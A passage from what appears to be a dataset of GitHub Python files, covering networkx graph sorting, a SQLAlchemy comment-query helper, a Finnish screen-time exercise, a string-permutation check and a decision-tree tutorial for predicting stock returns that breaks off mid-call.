edges\n continue\n for key in ['pid', 'ppid', 'sid', 'pgid']:\n try:\n G.nodes[v][key] = new_index[G.nodes[v][key]]\n except KeyError:\n pass\n print(\"\\t\\t\\tlog\", key, G.nodes[v])\n if k.startswith(\"setpgid\"):\n #from networkx.classes.coreviews import AtlasView, AdjacencyView\n #ed=G[u][v][k]\n #@relatively_slow!\n G.remove_edge(u, v, k)\n G.add_edge(u, v, rearrange_labels(k,new_index))\n break\n #print(v, \": res on \" , G.nodes[v])\n\n return G\n\n\n# Get a list of all the file paths that ends with .txt from in specified directory\ndef rm_by_mask(prefix=\"\"):\n fileList = glob.glob(prefix)\n # Iterate over the list of filepaths & remove each file.\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n print(\"Error while deleting file : \", filePath)\n\n\ndef prior_topological_sort(G):\n \"\"\"\n References\n ----------\n .. [1] Manber, U. (1989).\n *Introduction to Algorithms - A Creative Approach.* Addison-Wesley.\n [2] networkx dag algorithms implementation\n \"\"\"\n if not G.is_directed():\n raise nx.NetworkXError(\n \"Topological sort not defined on undirected graphs.\")\n\n indegree_map = {v: d for v, d in G.in_degree() if d > 0}\n # These nodes have zero indegree and ready to be returned.\n zero_indegree = [v for v, d in G.in_degree() if d == 0]\n\n def nofork(element):\n if element[2].startswith('fork'):\n return 1\n return 0\n\n while zero_indegree:\n node = zero_indegree.pop()\n if node not in G: # мы достали одну вершину\n raise RuntimeError(\"Graph changed during iteration\")\n edg = list(G.edges(node, keys=True)) # достанем её потомков, сортанём рёбра в верной последовательности действий\n edg = sorted(edg, key=nofork)\n for _, child, _ in edg:\n try:\n indegree_map[child] -= 1\n except KeyError:\n raise RuntimeError(\"Graph changed during iteration\")\n if indegree_map[child] == 0:\n zero_indegree.append(child)\n del indegree_map[child]\n\n yield node\n\n if indegree_map:\n raise nx.NetworkXUnfeasible(\"Graph contains a cycle or graph changed \"\n \"during iteration\")\n\n\ndef get_inferring_syscalls(G, top_sorted_nodes):\n top_sorted_edges = list()\n for node in top_sorted_nodes:\n for (u, v, k) in G.in_edges(node, keys=True):\n if k == 'follow':\n continue\n top_sorted_edges.append((u, v, k))\n return top_sorted_edges\n","repo_name":"nefanov/reconstructor","sub_path":"backstuff.py","file_name":"backstuff.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"34287950599","text":"import datetime\nfrom typing import Any, Dict, Union\n\nfrom sqlalchemy import and_, not_\nfrom sqlalchemy.exc import NoResultFound\nfrom sqlalchemy.orm import Query, Session\n\nfrom .db_table import CommentsDB, UserDB\n\n\nclass QueryHelper:\n \"\"\"Service class to handle basic operations with database query\"\"\"\n def __init__(self, filters: Dict):\n \"\"\"\n :param filters: Filters to find materialized path patterns\n :type filters: Dict\n \"\"\"\n self._path_filters = filters\n self.keys = ['comment_id', 'user', 'comment', 'date']\n\n @staticmethod\n def _filter_by_time(\n query: Query,\n start: Union[bool, float] = None,\n end: Union[bool, float] = None\n ) -> Query:\n \"\"\"\n Filter data by time interval\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param start: Optional, if specified: start of time interval\n :type start: Union[bool, float]\n :param end: Optional, if specified: end of time interval\n :type end: Union[bool, float]\n :return: Modified query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n\n start = start if start else 0\n end = end if end else datetime.datetime.now().timestamp()\n query = query.filter(and_(CommentsDB.date > start,\n CommentsDB.date < end))\n return query\n\n @staticmethod\n def _parse_parameter(key: str, **kwargs: Any) -> Union[Any, None]:\n \"\"\"\n Parse value from keyword arguments\n :param key: Key which value to parse from kwargs\n :type key: str\n :param kwargs: Keyword arguments\n :type kwargs: Any\n :return: Parsed value if it is exists, else None\n :rtype: Union[Any, None]\n \"\"\"\n return kwargs[key] if key in kwargs else None\n\n @staticmethod\n def get_base_query(session: Session) -> Query:\n \"\"\"\n Create basic query to database\n :param session: Manages persistence operations for ORM-mapped objects\n :type session: sqlalchemy.orm.Session\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n query = session.query(\n CommentsDB.path,\n CommentsDB.id,\n UserDB.user,\n CommentsDB.comment,\n CommentsDB.date\n ).join(UserDB)\n return query\n\n @staticmethod\n def check_query(query: Query) -> Union[Query, None]:\n \"\"\"\n Check if query return nothing\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :return: Query if result is not empty, else None\n :rtype: Union[sqlalchemy.orm.Query, None]\n \"\"\"\n try:\n result = query.one()\n except NoResultFound:\n return\n return result\n\n @staticmethod\n def child_path(query: Query, path: str) -> Query:\n \"\"\"\n Get nested comments from specified parent path\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param path: Parent path in comments table\n :type path: str\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n path_filter = path + '.'\n query = query.filter(CommentsDB.path.startswith(path_filter))\n return query\n\n def one_level_child_path(self, query: Query, path: str) -> Query:\n \"\"\"\n Get only one level depth comments form specified parent path\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param path: Parent path in comments table\n :type path: str\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n path_filter = path + self._path_filters['inherits_one_level']\n query = self.child_path(query, path)\n query = query.filter(not_(CommentsDB.path.regexp_match(path_filter)))\n return query\n\n def first_level_path(self, query: Query) -> Query:\n \"\"\"\n Get only first level comment from comments table\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :return: Query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n path_filter = self._path_filters['first_level']\n query = query.filter(not_(CommentsDB.path.regexp_match(path_filter)))\n\n return query\n\n def modify_data(self, query: Query, **kwargs: Any) -> Query:\n \"\"\"\n Apply selected filters for query\n :param query: Query to database\n :type query: sqlalchemy.orm.Query\n :param kwargs: Keyword arguments containing filter parameters:\n :start: (float) Start of time interval for filtering data\n :end: (float) End of time interval for filtering data\n :last: (bool) Get only last actual comments\n :do_sort: (bool) Sort data by time\n :type kwargs: Any\n :return: Modified query\n :rtype: sqlalchemy.orm.Query\n \"\"\"\n last = self._parse_parameter('last', **kwargs)\n do_sort = self._parse_parameter('do_sort', **kwargs)\n start = self._parse_parameter('start', **kwargs)\n end = self._parse_parameter('end', **kwargs)\n\n if last:\n query = query.filter_by(last=True)\n if start or end:\n query = self._filter_by_time(query, start=start, end=end)\n if do_sort:\n query = query.order_by(CommentsDB.date)\n\n return query\n","repo_name":"violonistahiles/epam_final_task","sub_path":"db_backend/query_helper.py","file_name":"query_helper.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26410826287","text":"from datetime import datetime, timedelta\r\n \r\ndef ruutuaika():\r\n if True:\r\n tuloste_tiedosto = input(\"Tiedosto: \")\r\n aloitus_paiva = input(\"Aloituspäivä: \") \r\n kpl_paivia = int(input(\"Montako päivää: \"))\r\n else: \r\n tuloste_tiedosto = \"kesakuun_loppu.txt\"\r\n aloitus_paiva =\"24.6.2020\"\r\n kpl_paivia = 2\r\n \r\n aika = datetime.strptime(aloitus_paiva, \"%d.%m.%Y\") \r\n \r\n print(\"Anna ruutuajat kunakin päivänä minuutteina (TV tietokone mobiililaite):\")\r\n i = 0\r\n lista_ajoista = []\r\n while i < kpl_paivia:\r\n paiva = (aika + timedelta(days=i)).strftime(\"%d.%m.%Y\")\r\n ruutuaika = input(f'Ruutuaika {paiva}: ')\r\n lista_ajoista.append((paiva, ruutuaika))\r\n i += 1\r\n \r\n eka_paiviva = aika.strftime(\"%d.%m.%Y\")\r\n viimeinen_paiva = paiva = (aika + timedelta(days=kpl_paivia - 1)).strftime(\"%d.%m.%Y\")\r\n aika_yhteensa = 0\r\n for a in lista_ajoista:\r\n for b in a[1].split(\" \"):\r\n aika_yhteensa += int(b)\r\n \r\n aika_keskimaarin = aika_yhteensa / kpl_paivia\r\n \r\n open(tuloste_tiedosto, \"w\").close()\r\n with open(tuloste_tiedosto, \"a\") as output:\r\n output.write(f'Ajanjakso: {eka_paiviva}-{viimeinen_paiva}\\n')\r\n output.write(f'Yhteensä minuutteja: {aika_yhteensa}\\n')\r\n output.write(f'Keskimäärin minuutteja päivässä: {aika_keskimaarin}\\n')\r\n \r\n for i in lista_ajoista:\r\n j = i[1].split(\" \")\r\n output.write(f'{i[0]}: {j[0]}/{j[1]}/{j[2]}\\n')\r\n \r\n print(f'Tiedot tallennettu tiedostoon {tuloste_tiedosto}')\r\n \r\n#main\r\nif __name__ == \"__main__\":\r\n ruutuaika()","repo_name":"TomiSar/ProgrammingMOOC2020","sub_path":"osa07-11_ruutuaika/src/ruutuaika.py","file_name":"ruutuaika.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70924935368","text":"from collections import Counter\n\ndef verify_permutation(string1, string2):\n count_string1, count_string2 = Counter(string1), Counter(string2)\n\n if len(count_string1) != len(count_string2):\n return False\n for element in count_string1:\n if element in count_string2:\n if count_string2[element] == count_string1[element]:\n continue\n else:\n return False\n else:\n return False\n return True\n# T.C - create 2 dicts, run for loop over length - O(n)\n\ndef main():\n result = verify_permutation(\"aba\",\"aab\")\n print(result)\nmain()","repo_name":"asinha01/CTC","sub_path":"1.2Checkstringpermutation.py","file_name":"1.2Checkstringpermutation.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7010465591","text":"# How to use decision trees to predict equity returns and price moves\n# In this notebook, we illustrate how to use tree-based models to gain insight and make predictions.\n# To demonstrate regression trees we predict returns, and for the classification case, we return to the example of\n# positive and negative asset price moves.\n\nimport os, sys\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport graphviz\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom matplotlib.ticker import FuncFormatter\nfrom matplotlib import cm\n\nfrom scipy.stats import spearmanr\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor, export_graphviz, _tree\nfrom sklearn.linear_model import LinearRegression, LogisticRegression\nfrom sklearn.model_selection import train_test_split, GridSearchCV, learning_curve\nfrom sklearn.metrics import roc_auc_score, roc_curve, mean_squared_error, make_scorer\nfrom sklearn.tree._tree import Tree\n\n\nclass MultipleTimeSeriesCV:\n \"\"\"Generates tuples of train_idx, test_idx pairs\n Assumes the MultiIndex contains levels 'symbol' and 'date'\n purges overlapping outcomes\"\"\"\n\n def __init__(\n self,\n n_splits=3,\n train_period_length=126,\n test_period_length=21,\n lookahead=None,\n date_idx=\"date\",\n shuffle=False,\n ):\n self.n_splits = n_splits\n self.lookahead = lookahead\n self.test_length = test_period_length\n self.train_length = train_period_length\n self.shuffle = shuffle\n self.date_idx = date_idx\n\n def split(self, X, y=None, groups=None):\n unique_dates = X.index.get_level_values(self.date_idx).unique()\n days = sorted(unique_dates, reverse=True)\n split_idx = []\n for i in range(self.n_splits):\n test_end_idx = i * self.test_length\n test_start_idx = test_end_idx + self.test_length\n train_end_idx = test_start_idx + self.lookahead - 1\n train_start_idx = train_end_idx + self.train_length + self.lookahead - 1\n split_idx.append([train_start_idx, train_end_idx, test_start_idx, test_end_idx])\n\n dates = X.reset_index()[[self.date_idx]]\n for train_start, train_end, test_start, test_end in split_idx:\n\n train_idx = dates[\n (dates[self.date_idx] > days[train_start])\n & (dates[self.date_idx] <= days[train_end])\n ].index\n test_idx = dates[\n (dates[self.date_idx] > days[test_start]) & (dates[self.date_idx] <= days[test_end])\n ].index\n if self.shuffle:\n np.random.shuffle(list(train_idx))\n yield train_idx.to_numpy(), test_idx.to_numpy()\n\n def get_n_splits(self, X, y, groups=None):\n return self.n_splits\n\n\nsns.set_style(\"whitegrid\")\nplt.rcParams[\"figure.dpi\"] = 300\nplt.rcParams[\"font.size\"] = 16\npd.options.display.float_format = \"{:,.2f}\".format\nsys.path.insert(1, os.path.join(sys.path[0], \"..\"))\n\nresults_path = Path(\"../data/ch11\", \"decision_trees\")\nif not results_path.exists():\n results_path.mkdir(parents=True)\n\nif __name__ == \"__main__\":\n ## Load Model Data\n # We use a simplified version of the data set constructed in Chapter 4, Alpha factor research. It consists of daily\n # stock prices provided by Quandl for the 2010-2017 period and various engineered features. The details can be found\n # in the notebook [data_prep](00_data_prep.ipynb) in the GitHub repo for this chapter.\n # The decision tree models in this chapter are not equipped to handle missing or categorical variables, so we will\n # apply dummy encoding to the latter after dropping any of the former.\n with pd.HDFStore(\"../data/11_data.h5\") as store:\n data = store[\"us/equities/monthly\"]\n data.info()\n\n ## Simple Regression Tree with Time Series Data\n # Regression trees make predictions based on the mean outcome value for the training samples assigned to a given\n # node and typically rely on the mean-squared error to select optimal rules during recursive binary splitting.\n # Given a training set, the algorithm iterates over the predictors, $X_1, X_2, ..., X_p$, and possible cutpoints,\n # $s_1, s_2, ..., s_N$, to find an optimal combination. The optimal rule splits the feature space into two regions,\n # $\\{X\\mid X_i < s_j\\}$ and $\\{X\\mid X_i > s_j\\}$, with values for the $X_i$ feature either below or above the\n # $s_j$ threshold so that predictions based on the training subsets maximize the reduction of the squared residuals\n # relative to the current node.\n\n ### Generate two lags of monthly returns\n X2 = data.loc[:, [\"target\", \"return_1m\"]]\n X2.columns = [\"y\", \"t-1\"]\n X2[\"t-2\"] = data.groupby(level=\"ticker\").return_1m.shift()\n X2 = X2.dropna()\n X2.info()\n\n y2 = X2.y\n X2 = X2.drop(\"y\", axis=1)\n\n ### Explore Data\n # Note the small spike where we clipped the data.\n sns.histplot(data=y2)\n plt.tight_layout()\n plt.savefig(\"images/01-01.png\")\n\n ### Configure Tree\n # Let's start with a simplified example to facilitate visualization and only use two months of lagged returns to\n # predict the following month, in the vein of an AR(2) model from the last chapter:\n reg_tree_t2 = DecisionTreeRegressor(\n criterion=\"squared_error\",\n splitter=\"best\",\n max_depth=6,\n min_samples_split=2,\n min_samples_leaf=50,\n min_weight_fraction_leaf=0.0,\n max_features=None,\n random_state=42,\n max_leaf_nodes=None,\n min_impurity_decrease=0.0,\n )\n\n ### Train Decision Tree\n reg_tree_t2.fit(X=X2, y=y2)\n\n ### Visualize Tree\n # You can visualize the tree using the graphviz library (see GitHub for installation instructions) because sklearn\n # can output a description of the tree using the .dot language used by that library. You can configure the output\n # to include feature and class labels and limit the number of levels to keep the chart readable, as follows:\n out_file = results_path / \"reg_tree_t2.dot\"\n dot_data = export_graphviz(\n reg_tree_t2,\n out_file=out_file.as_posix(),\n feature_names=X2.columns,\n max_depth=2,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Compare with Linear Regression\n # The OLS summary below and a visualization of the first two levels of the decision tree above reveal the striking\n # differences between the models. The OLS model provides three parameters for the intercepts and the two features\n # in line with the linear assumption. In contrast, the regression tree chart above displays for each node of the\n # first two levels the feature and threshold used to split the data (note that features can be used repeatedly),\n # as well as the current value of the mean-squared error (MSE), the number of samples, and predicted value based\n # on these training samples. The tree chart also highlights the uneven distribution of samples across the nodes as\n # the numbers vary between 31,000 and 65,000 samples after only two splits.\n\n #### statsmodels OLS\n ols_model = sm.OLS(endog=y2, exog=sm.add_constant(X2))\n result = ols_model.fit()\n print(result.summary())\n\n #### sklearn Linear Regression\n lin_reg = LinearRegression()\n lin_reg.fit(X=X2, y=y2)\n print(lin_reg.intercept_)\n print(lin_reg.coef_)\n\n ### Linear Regression vs Regression Tree Decision Surfaces\n # To further illustrate the different assumptions about the functional form of the relationships between the input\n # variables and the output, we can visualize current return predictions as a function of the feature space, that is,\n # as a function of the range of values for the lagged returns. The following figure shows the current period return\n # as a function of returns one and two periods ago for linear regression and the regression tree:\n # The linear-regression model result on the right side underlines the linearity of the relationship between lagged\n # and current returns, whereas the regression tree chart on the left illustrates the non-linear relationship\n # encoded in the recursive partitioning of the feature space.\n t1, t2 = np.meshgrid(\n np.linspace(X2[\"t-1\"].quantile(0.01), X2[\"t-1\"].quantile(0.99), 100),\n np.linspace(X2[\"t-2\"].quantile(0.01), X2[\"t-2\"].quantile(0.99), 100),\n )\n X_data = np.c_[t1.ravel(), t2.ravel()]\n\n fig, axes = plt.subplots(ncols=2, figsize=(12, 5))\n\n # Linear Regression\n ret1 = lin_reg.predict(X_data).reshape(t1.shape)\n surface1 = axes[0].contourf(t1, t2, ret1, cmap=\"Blues\")\n plt.colorbar(mappable=surface1, ax=axes[0])\n\n # Regression Tree\n ret2 = reg_tree_t2.predict(X_data).reshape(t1.shape)\n surface2 = axes[1].contourf(t1, t2, ret2, cmap=\"Blues\")\n plt.colorbar(mappable=surface2, ax=axes[1])\n\n # Format plots\n titles = [\"Linear Regression\", \"Regression Tree\"]\n for i, ax in enumerate(axes):\n ax.set_xlabel(\"t-1\")\n ax.set_ylabel(\"t-2\")\n ax.set_title(titles[i])\n\n fig.suptitle(\"Decision Surfaces\", fontsize=14)\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-02.png\")\n\n ## Simple Classification Tree with Time Series Data\n # A classification tree works just like the regression version, except that categorical nature of the outcome\n # requires a different approach to making predictions and measuring the loss. While a regression tree predicts\n # the response for an observation assigned to a leaf node using the mean outcome of the associated training samples,\n # a classification tree instead uses the mode, that is, the most common class among the training samples in the\n # relevant region. A classification tree can also generate probabilistic predictions based on relative class frequencies.\n\n ### Loss Functions\n # When growing a classification tree, we also use recursive binary splitting but, instead of evaluating the quality\n # of a decision rule using the reduction of the mean-squared error, we can use the classification error rate, which\n # is simply the fraction of the training samples in a given (leave) node that do not belong to the most common class.\n # However, the alternative measures, Gini Index or Cross-Entropy, are preferred because they are more sensitive to\n # node purity than the classification error rate. Node purity refers to the extent of the preponderance of a single\n # class in a node. A node that only contains samples with outcomes belonging to a single class is pure and imply\n # successful classification for this particular region of the feature space.\n\n def entropy(f):\n return (-f * np.log2(f) - (1 - f) * np.log2(1 - f)) / 2\n\n def gini(f):\n return 2 * f * (1 - f)\n\n def misclassification_rate(f):\n return np.where(f <= 0.5, f, 1 - f)\n\n # Both the Gini Impurity and the Cross-Entropy measure take on smaller values when the class proportions approach\n # zero or one, that is, when the child nodes become pure as a result of the split and are highest when the class\n # proportions are even or 0.5 in the binary case. The chart below visualizes the values assumed by these two\n # measures and the misclassification error rates across the [0, 1] interval of proportions.\n\n x = np.linspace(0, 1, 10000)\n (\n pd.DataFrame(\n {\n \"Gini\": gini(x),\n \"Entropy\": entropy(x),\n \"Misclassification Rate\": misclassification_rate(x),\n },\n index=x,\n ).plot(title=\"Classification Loss Functions\", lw=2, style=[\"-\", \"--\", \":\"])\n )\n plt.tight_layout()\n plt.savefig(\"images/01-03.png\")\n\n #### Compare computation time\n # Gini is often preferred over entropy because it computes faster:\n print(misclassification_rate(x))\n print(gini(x))\n print(entropy(x))\n\n ### Configure Tree\n clf_tree_t2 = DecisionTreeClassifier(\n criterion=\"gini\",\n splitter=\"best\",\n max_depth=5,\n min_samples_split=1000,\n min_samples_leaf=1,\n min_weight_fraction_leaf=0.0,\n max_features=None,\n random_state=42,\n max_leaf_nodes=None,\n min_impurity_decrease=0.0,\n class_weight=None,\n )\n\n ### Train Tree\n y_binary = (y2 > 0).astype(int)\n print(y_binary.value_counts())\n\n clf_tree_t2.fit(X=X2, y=y_binary)\n\n ### Visualize Tree\n out_file = results_path / \"clf_tree_t2.dot\"\n dot_data = export_graphviz(\n clf_tree_t2,\n out_file=out_file.as_posix(),\n feature_names=X2.columns,\n class_names=[\"Down\", \"Up\"],\n max_depth=2,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Compare with Logistic Regression\n #### Statsmodels\n log_reg_sm = sm.Logit(endog=y_binary, exog=sm.add_constant(X2))\n log_result = log_reg_sm.fit()\n print(log_result.summary())\n\n #### sklearn\n log_reg_sk = LogisticRegression()\n log_reg_sk.fit(X=X2, y=y_binary)\n print(log_reg_sk.coef_)\n\n ### Decision Surfaces: Classifier Tree vs. Logistic Regression\n fig, axes = plt.subplots(ncols=2, figsize=(12, 5))\n\n # Linear Regression\n ret1 = log_reg_sk.predict_proba(X_data)[:, 1].reshape(t1.shape)\n surface1 = axes[0].contourf(t1, t2, ret1, cmap=\"Blues\")\n plt.colorbar(mappable=surface1, ax=axes[0])\n\n # Regression Tree\n ret2 = clf_tree_t2.predict_proba(X_data)[:, 1].reshape(t1.shape)\n surface2 = axes[1].contourf(t1, t2, ret2, cmap=\"Blues\")\n plt.colorbar(mappable=surface2, ax=axes[1])\n\n # Format plots\n titles = [\"Logistic Regression\", \"Classification Tree\"]\n for i, ax in enumerate(axes):\n ax.set_xlabel(\"t-1\")\n ax.set_ylabel(\"t-2\")\n ax.set_title(titles[i])\n\n fig.suptitle(\"Decision Surfaces\", fontsize=20)\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-04.png\")\n\n ## Regression Tree with all Features\n # We now train, visualize, and evaluate a regression tree with up to 5 consecutive splits using 80% of the samples\n # for training to predict the remaining 20%. We are taking a shortcut here to simplify the illustration and use\n # the built-in train_test_split, which does not protect against lookahead bias, as our custom iterator. The tree\n # configuration implies up to $2^5=32$ leaf nodes that, on average in the balanced case, would contain over 4,300\n # of the training samples.\n\n ### Train-Test Split\n X = pd.get_dummies(data.drop(\"target\", axis=1))\n y = data.target\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n ### Configure Tree\n # The output after training the model displays all the DecisionTreeClassifier parameters that we will address in\n # more detail in the next section when we discuss parameter-tuning.\n regression_tree = DecisionTreeRegressor(\n criterion=\"mse\",\n splitter=\"best\",\n max_depth=5,\n min_samples_split=2,\n min_samples_leaf=1,\n min_weight_fraction_leaf=0.0,\n max_features=None,\n random_state=42,\n max_leaf_nodes=None,\n min_impurity_decrease=0.0,\n )\n\n ### Train Model\n regression_tree.fit(X=X_train, y=y_train)\n\n ### Visualize Tree\n # The result shows that the model uses a variety of different features and indicates the split rules for both\n # continuous and categorical (dummy) variables.\n out_file = results_path / \"reg_tree.dot\"\n dot_data = export_graphviz(\n regression_tree,\n out_file=out_file.as_posix(),\n feature_names=X_train.columns,\n max_depth=3,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Evaluate Test Set\n y_pred = regression_tree.predict(X_test)\n print(np.sqrt(mean_squared_error(y_pred=y_pred, y_true=y_test)))\n\n r, p = spearmanr(y_pred, y_test)\n print(f\"{r*100:.2f} (p-value={p:.2%})\")\n\n ## Classification Tree with all Features\n # We will now train, visualize, and evaluate a classification tree with up to 5 consecutive splits using 80% of the\n # samples for training to predict the remaining 20%. We are taking a shortcut here to simplify the illustration and\n # use the built-in train_test_split, which does not protect against lookahead bias, as our custom iterator. The tree\n # configuration implies up to $2^5=32$ leaf nodes that, on average in the balanced case, would contain over 4,300 of\n # the training samples.\n\n ### Train-Test Split\n y_binary = (y > 0).astype(int)\n print(y_binary.value_counts())\n\n X_train, X_test, y_train, y_test = train_test_split(X, y_binary, test_size=0.2, random_state=42)\n\n clf = DecisionTreeClassifier(criterion=\"gini\", max_depth=5, random_state=42)\n clf.fit(X=X_train, y=y_train)\n\n ### Plot Tree\n out_file = results_path / \"clf_tree.dot\"\n dot_data = export_graphviz(\n clf,\n out_file=out_file.as_posix(),\n feature_names=X.columns,\n class_names=[\"Down\", \"Up\"],\n max_depth=3,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Evaluate Test Set\n # To evaluate the predictive accuracy of our first classification tree, we will use our test set to generate\n # predicted class probabilities. The `.predict_proba()` method produces one probability for each class. In the binary\n # class, these probabilities are complementary and sum to 1, so we only need the value for the positive class.\n y_score = clf.predict_proba(X=X_test)[:, 1]\n\n # To evaluate the generalization error, we will use the area under the curve based on the receiver-operating\n # characteristic that we introduced in Chapter 6, The Machine Learning Process. The result indicates a significant\n # improvement above and beyond the baseline value of 0.5 for a random prediction:\n print(roc_auc_score(y_score=y_score, y_true=y_test))\n\n ### Print Decision Path\n # Inspired by\n # https://stackoverflow.com/questions/20224526/how-to-extract-the-decision-rules-from-scikit-learn-decision-tree\n\n help(Tree)\n\n def tree_to_code(tree, feature_names):\n if isinstance(tree, DecisionTreeClassifier):\n model = \"clf\"\n elif isinstance(tree, DecisionTreeRegressor):\n model = \"reg\"\n else:\n raise ValueError(\"Need Regression or Classification Tree\")\n\n tree_ = tree.tree_\n feature_name = [\n feature_names[i] if i != _tree.TREE_UNDEFINED else \"undefined!\" for i in tree_.feature\n ]\n print(\"def tree({}):\".format(\", \".join(feature_names)))\n\n def recurse(node, depth):\n indent = \" \" * depth\n if tree_.feature[node] != _tree.TREE_UNDEFINED:\n name = feature_name[node]\n threshold = tree_.threshold[node]\n print(indent, f\"if {name} <= {threshold:.2%}\")\n recurse(tree_.children_left[node], depth + 1)\n print(indent, f\"else: # if {name} > {threshold:.2%}\")\n recurse(tree_.children_right[node], depth + 1)\n else:\n pred = tree_.value[node][0]\n val = pred[1] / sum(pred) if model == \"clf\" else pred[0]\n print(indent, f\"return {val:.2%}\")\n\n recurse(0, 1)\n\n tree_to_code(clf_tree_t2, X2.columns)\n\n ## Overfitting, Regularization & Parameter Tuning\n # Decision trees have a strong tendency to overfit, especially when a dataset has a large number of features\n # relative to the number of samples. As discussed in previous chapters, overfitting increases the prediction error\n # because the model does not only learn the signal contained in the training data, but also the noise.\n # There are several ways to address the risk of overfitting.\n # Decision trees provide several regularization hyperparameters to limit the growth of a tree and the associated\n # complexity. While every split increases the number of nodes, it also reduces the number of samples available per\n # node to support a prediction. For each additional level, twice the number of samples is needed to populate the\n # new nodes with the same sample density.\n\n ### Decision Tree Parameters\n # The following table lists key parameters available for this purpose in the sklearn decision tree implementation.\n # After introducing the most important parameters, we will illustrate how to use cross-validation to optimize the\n # hyperparameter settings with respect to the bias-variance tradeoff and lower prediction errors:\n\n # | Parameter | Default | Options | Description |\n # |--------------------------|---------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n # | criterion | gini | Regression: MSE, MAE Classification: Gini impurity, Cross Entropy | Metric to evaluate split quality. |\n # | splitter | best | best, random | How to choose the split at each node. Supported strategies are “best” to choose the best split and “random” to choose the best random split. |\n # | max_depth | None | int | Max # of levels in tree. Split nodes until max_depth is reached or all leaves are pure or all leaves contain less than min_samples_split samples. |\n # | max_features | None | None: max_features=n_features; int; float (fraction): int(max_features * n_features) auto, sqrt: max_features=sqrt(n_features). log2: max_features=log2(n_features). | # of features to consider when evaluating split |\n # | max_leaf_nodes | None | None: unlimited # of leaf nodes int | Continue to split nodes that reduce relative impurity the most until reaching max_leaf_nodes. |\n # | min_impurity_decrease | 0 | float | Split node if impurity decreases by at least this value. |\n # | min_samples_leaf | 1 | int; float (as percentage of N) | Minimum # of samples to be at a leaf node. A split will only be considered if there are at least min_samples_leaf training samples in each of the left and right branches. May smoothen the model, esp. for regression. |\n # | min_samples_split | 2 | int; float (as percentage of N) | The minimum number of samples required to split an internal node: |\n # | min_weight_fraction_leaf | 0 | NA | The minimum weighted fraction of the sum total of weights (of all the input samples) required to be at a leaf node. Samples have equal weight when sample_weight is not provided (in fit method). |\n # | class_weight | None | balanced: inversely proportional to class frequencies dict: {class_label: weight} list of dicts (for multi-output) | Weights associated with classes |\n\n # The `max_depth` parameter imposes a hard limit on the number of consecutive splits and represents the most\n # straightforward way to cap the growth of a tree. The m`in_samples_split` and `min_samples_leaf` parameters are\n # alternative, data-driven ways to limit the growth of a tree. Rather than imposing a hard limit on the number of\n # consecutive splits, these parameters control the minimum number of samples required to further split the data.\n # The latter guarantees a certain number of samples per leaf, while the former can create very small leaves if a\n # split results in a very uneven distribution. Small parameter values facilitate overfitting, while a high number\n # may prevent the tree from learning the signal in the data.\n # The default values are often quite low, and you should use cross-validation to explore a range of potential values.\n # You can also use a float to indicate a percentage as opposed to an absolute number.\n\n ### Cross-validation parameters\n n_splits = 10\n train_period_length = 60\n test_period_length = 6\n lookahead = 1\n\n cv = MultipleTimeSeriesCV(\n n_splits=n_splits,\n train_period_length=train_period_length,\n test_period_length=test_period_length,\n lookahead=lookahead,\n )\n\n max_depths = range(1, 16)\n\n ### Finding the best trees using GridSearchCV\n # scikit-learn provides a method to define ranges of values for multiple hyperparameters. It automates the process\n # of cross-validating the various combinations of these parameter values to identify the optimal configuration.\n # Let's walk through the process of automatically tuning your model.\n\n #### Define parameter grid\n # The first step is to define a dictionary where the keywords name the hyperparameters, and the values list the\n # parameter settings to be tested:\n\n param_grid = {\n \"max_depth\": [2, 3, 4, 5, 6, 7, 8, 10, 12, 15],\n \"min_samples_leaf\": [5, 25, 50, 100],\n \"max_features\": [\"sqrt\", \"auto\"],\n }\n\n #### Classification Tree\n # Then, we instantiate a model object:\n clf = DecisionTreeClassifier(random_state=42)\n\n # Now we instantiate the GridSearchCV object, providing the estimator object and parameter grid, as well as a\n # scoring method and cross-validation choice to the initialization method. We'll use an object of our custom\n # OneStepTimeSeriesSplit class, initialized to use ten folds for the cv parameter, and set the scoring to the\n # roc_auc metric. We can parallelize the search using the n_jobs parameter and automatically obtain a trained model\n # that uses the optimal hyperparameters by setting `refit=True`.\n gridsearch_clf = GridSearchCV(\n estimator=clf,\n param_grid=param_grid,\n 